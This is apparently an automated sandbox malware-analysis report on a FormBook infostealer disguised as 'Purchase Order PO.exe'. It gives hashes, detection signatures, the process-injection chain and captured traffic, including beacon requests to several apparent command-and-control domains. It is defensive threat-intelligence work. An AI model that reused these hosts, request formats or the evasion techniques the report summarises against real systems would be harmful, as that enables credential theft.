Windows Analysis Report
Purchase Order PO.exe

Overview

General Information

Sample name: Purchase Order PO.exe
Analysis ID: 1560968
MD5: 28d64b4cc91c016c93eb28e1f465efd2
SHA1: a627004d9e1217d7aa46650f6f7c4e4f085d446b
SHA256: 98ffb783354435168540dc2e8eb4570f865f324169d553ffbad828bf9f33acd3
Tags: exe, user-James_inthe_box
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Purchase Order PO.exe (PID: 6700 cmdline: "C:\Users\user\Desktop\Purchase Order PO.exe" MD5: 28D64B4CC91C016C93EB28E1F465EFD2)
    • Purchase Order PO.exe (PID: 3732 cmdline: "C:\Users\user\Desktop\Purchase Order PO.exe" MD5: 28D64B4CC91C016C93EB28E1F465EFD2)
      • QfgdvbjddZ.exe (PID: 3872 cmdline: "C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 4476 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • QfgdvbjddZ.exe (PID: 3104 cmdline: "C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1148 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
2.2.Purchase Order PO.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.Purchase Order PO.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
No Sigma rule has matched
No Suricata rule has matched

                AV Detection

                Source: Purchase Order PO.exeAvira: detected
                Source: Purchase Order PO.exeReversingLabs: Detection: 65%
                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2135061100.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Purchase Order PO.exeJoe Sandbox ML: detected
                Source: Purchase Order PO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Purchase Order PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: Purchase Order PO.exe, 00000002.00000002.2132616252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169823337.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: Purchase Order PO.exe, 00000002.00000002.2132616252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169823337.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QfgdvbjddZ.exe, 00000006.00000002.4169230923.000000000060E000.00000002.00000001.01000000.0000000C.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4169232027.000000000060E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Purchase Order PO.exe, 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2131525150.0000000004C74000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2135458360.0000000004E29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Purchase Order PO.exe, Purchase Order PO.exe, 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2131525150.0000000004C74000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2135458360.0000000004E29000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D2C4E0 FindFirstFileW,FindNextFileW,FindClose,7_2_02D2C4E0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 4x nop then jmp 0114483Fh0_2_01144668
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 4x nop then jmp 07468DFAh0_2_07468802
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax7_2_02D19E40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then mov ebx, 00000004h7_2_04DE04F8

                Networking

                Source: DNS query: www.cyperla.xyz
                Source: DNS query: www.070002018.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 22 Nov 2024 14:12:34 GMTserver: Apacheset-cookie: __tad=1732284754.2783085; expires=Mon, 20-Nov-2034 14:12:34 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 22 Nov 2024 14:12:37 GMTserver: Apacheset-cookie: __tad=1732284757.5675792; expires=Mon, 20-Nov-2034 14:12:37 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 22 Nov 2024 14:12:40 GMTserver: Apacheset-cookie: __tad=1732284760.2043783; expires=Mon, 20-Nov-2034 14:12:40 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: GET /qygv/?o6=SpTPojpx7H&Mr60=PNgLNtFNavTWVACgmh5xCzkhObl4Vn/3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4Wmu6EeWsOoRA0CokgLA8hMNXivrFO8nzFLsU= HTTP/1.1Host: www.cyperla.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qx5d/?Mr60=IyUQrkKyuirfHSYuUsN1+y7QK+I5LuF7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvprNVphaqp6upu86OQyU68aVNw4H3NL9j/8=&o6=SpTPojpx7H HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6ou6/?o6=SpTPojpx7H&Mr60=We72k2U8RqyHNx9ftVgFe72GQMu4iuXnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5WHt4/FI7OJ+yOIhAl7/LaOCHNokGW9xZfY= HTTP/1.1Host: www.madhf.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /v89f/?Mr60=vR3kWP+v98PFeIQUj3bnjAJ1ckGUCiAryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2Lg1hTzUbXWqWgu/JIX+7IudMx93vwrkJY0=&o6=SpTPojpx7H HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8m07/?o6=SpTPojpx7H&Mr60=2dHIoPS/8uSmn0UTpxXBmuXgzQfGtnFv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrQZLN2Jh+RnltKoXALFEyxyCbEquQJUaCWgU= HTTP/1.1Host: www.goldstarfootwear.shopAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6m2n/?Mr60=Yw5byyKwEzNx0WExUgXfy9WYeOrLRKTUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0orZ4vi8yKWUq5FVUlLJ03fvmQMl+mrBpOPM=&o6=SpTPojpx7H HTTP/1.1Host: www.070002018.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7yhf/?Mr60=OF4p1YkyIdfCe7eI49mlQK2eqaOY0Xp5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGru88xTxROuotR+L2zC6/y25G8bNDJ7z2wjg0=&o6=SpTPojpx7H HTTP/1.1Host: www.bienmaigrir.infoAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wu7k/?Mr60=msE8We8dGqsfRntVyauP2sAWp39/EoG83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVP4o7T3EWu90E9kOVVHAZEZpi4QiZXp0u9yLs=&o6=SpTPojpx7H HTTP/1.1Host: www.yc791022.asiaAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ykgd/?Mr60=9oLAy+SEg8JXgI2QYoJQeX3wYK8lZLg7WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/2tLKee7xpwwT0pkaI3y+yn0sIY/GpO9ikGE=&o6=SpTPojpx7H HTTP/1.1Host: www.jalan2.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fbpt/?Mr60=sHQWWiJRbY7Czg+qExT5lhETHbNnMxamWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqw7URZvJro+8N+ASp2jrUizWujex2cueM/JZ0=&o6=SpTPojpx7H HTTP/1.1Host: www.beyondfitness.liveAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dm4p/?o6=SpTPojpx7H&Mr60=nAmjXBwFyC120iWGDF5QEkfQ4V9pq4qW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4A1F2MgfpbEGtSAoSHmNs0Z+rY9P6APqFlZ34= HTTP/1.1Host: www.dietcoffee.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qtfx/?Mr60=KdNk/QG/ntQJ0Ylt7Lyc3znBwC3jfRDsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLMlSLf1n7d0xHEmolRusqu1Y7m0apztprjxI=&o6=SpTPojpx7H HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.cyperla.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cstrategy.online
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                Source: global trafficDNS traffic detected: DNS query: www.goldstarfootwear.shop
                Source: global trafficDNS traffic detected: DNS query: www.070002018.xyz
                Source: global trafficDNS traffic detected: DNS query: www.bienmaigrir.info
                Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
                Source: global trafficDNS traffic detected: DNS query: www.jalan2.online
                Source: global trafficDNS traffic detected: DNS query: www.beyondfitness.live
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                Source: global trafficDNS traffic detected: DNS query: www.alihones.lol
                Source: unknownHTTP traffic detected: POST /qx5d/ HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.cstrategy.onlineContent-Length: 201Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.cstrategy.online/qx5d/User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 22 Nov 2024 14:12:00 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 14:12:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ExXGxVIp2ZMU2E%2FTyHRW1RD9gnnczn%2BJqS7%2BunlbQOoFvujy1wGLzJjTT9zGMOcQV%2FV4E%2B6rGYhjLxAtn%2F6xAuJ0%2BaS2XwgMetJW7HB1sj%2BNe3OD8ig3PX0lI%2BWjaofse6bE9n4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e6984411928159b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1703&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=627&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 14:12:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpjdmCjOtmi6O3l0NAvsmt3hhYhEz2dVfeKcounSOmSSQ4RMyKOrF0TnN3SVZBXzuMXlYKVqDBkRocx0A3RrCvoO0FsWvzxbOBi8ExrY494jRvCgF2%2BqW0rwDKuE7DEduOkF5sw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e6984517b38430a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1673&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=647&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 14:12:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmtaxxdIQAoErVBf8Vv23IYJkyG3KpEmmy8ShcQPICxBhZg6q1BxTEvPZjCQeECByRY0SNqMPMXvy%2Fl7t4lF0OfeSjj6iTlokc%2FDlM5rhcLTQgjYrP2icGzDmry51CqdZAcyg%2FI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e698461d8568cee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1831&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10729&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Fri, 22 Nov 2024 14:12:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmDkL9SZCD6P9Ur0Wxy5m2bP4Tp6Z517UhkhobWGiH%2B9Ivi19wVPnqdfrLFsLn3cNwlW72O527HKjJlMmA8DfxFDyn19%2FqHuOv0Ck6nOglP8VsQdKIg4gFX560qnFPtDx6BJ1Xw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e6984730f1f41ad-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=11291&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=357&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 14:13:19 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 14:13:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 14:13:24 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 14:13:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2966
Connection: close
Vary: Accept-Encoding
ETag: "66cce1df-b96"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 14:13:34 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 14:13:37 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 14:13:40 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 14:13:42 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Fri, 22 Nov 2024 14:13:50 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Fri, 22 Nov 2024 14:13:53 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Fri, 22 Nov 2024 14:14:01 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
content-type: text/html
cache-control: private, no-cache, max-age=0
pragma: no-cache
date: Fri, 22 Nov 2024 14:14:08 GMT
server: LiteSpeed
content-encoding: gzip
vary: Accept-Encoding
transfer-encoding: chunked
connection: close
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
content-type: text/html
cache-control: private, no-cache, max-age=0
pragma: no-cache
date: Fri, 22 Nov 2024 14:14:11 GMT
server: LiteSpeed
content-encoding: gzip
vary: Accept-Encoding
transfer-encoding: chunked
connection: close
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
content-type: text/html
cache-control: private, no-cache, max-age=0
pragma: no-cache
date: Fri, 22 Nov 2024 14:14:13 GMT
server: LiteSpeed
content-encoding: gzip
vary: Accept-Encoding
transfer-encoding: chunked
connection: close
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
content-type: text/html
cache-control: private, no-cache, max-age=0
pragma: no-cache
content-length: 1249
date: Fri, 22 Nov 2024 14:14:16 GMT
server: LiteSpeed
connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 22 Nov 2024 14:14:23 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 22 Nov 2024 14:14:26 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
